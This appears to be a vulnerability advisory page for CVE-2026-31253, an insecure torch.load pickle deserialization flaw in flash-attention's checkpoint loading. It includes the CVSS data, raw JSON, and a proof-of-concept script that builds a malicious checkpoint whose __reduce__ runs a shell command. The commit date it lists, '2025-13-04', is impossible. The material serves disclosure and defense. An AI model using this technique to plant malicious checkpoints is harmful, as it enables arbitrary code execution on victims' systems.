Security Vulnerability Report
中文
CVE-2026-31253 CVSS 7.3 HIGH

CVE-2026-31253

Published: 2026-05-11 17:16:20
Last Modified: 2026-05-12 20:16:34
Source: [email protected]

Description

The flash-attention training framework thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains an insecure deserialization vulnerability (CWE-502) in its checkpoint loading mechanism. The load_checkpoint() function in checkpoint.py and the checkpoint loading code in eval.py use torch.load() without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a maliciously crafted checkpoint file. When a victim loads this checkpoint during model warmstarting or evaluation, arbitrary code is executed on the victim's system.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

flash-attention <= commit e724e2588cbe754beb97cf7c011b5e7e34119e62

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pickle import os import torch # Define a malicious class to execute code on deserialization class MaliciousCheckpoint: def __reduce__(self): # The command to execute (e.g., creating a proof-of-concept file) return (os.system, ('touch /tmp/VULNERABLE_POC',)) # Create the malicious payload payload = MaliciousCheckpoint() # Save as a fake checkpoint file with open('malicious_model.pth', 'wb') as f: pickle.dump(payload, f) print("Malicious checkpoint generated: malicious_model.pth") # Simulate the vulnerable loading process in flash-attention # This is what happens in the victim's eval.py or checkpoint.py try: # Vulnerable call: torch.load() without weights_only=True print("Simulating victim loading the checkpoint...") data = torch.load('malicious_model.pth') print("Checkpoint loaded successfully.") except Exception as e: print(f"Error during loading: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31253", "sourceIdentifier": "[email protected]", "published": "2026-05-11T17:16:20.307", "lastModified": "2026-05-12T20:16:34.110", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The flash-attention training framework thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains an insecure deserialization vulnerability (CWE-502) in its checkpoint loading mechanism. The load_checkpoint() function in checkpoint.py and the checkpoint loading code in eval.py use torch.load() without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a maliciously crafted checkpoint file. When a victim loads this checkpoint during model warmstarting or evaluation, arbitrary code is executed on the victim's system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/Dao-AILab/flash-attention", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31253-35d1e1393188813f9e77e2038104bc49", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.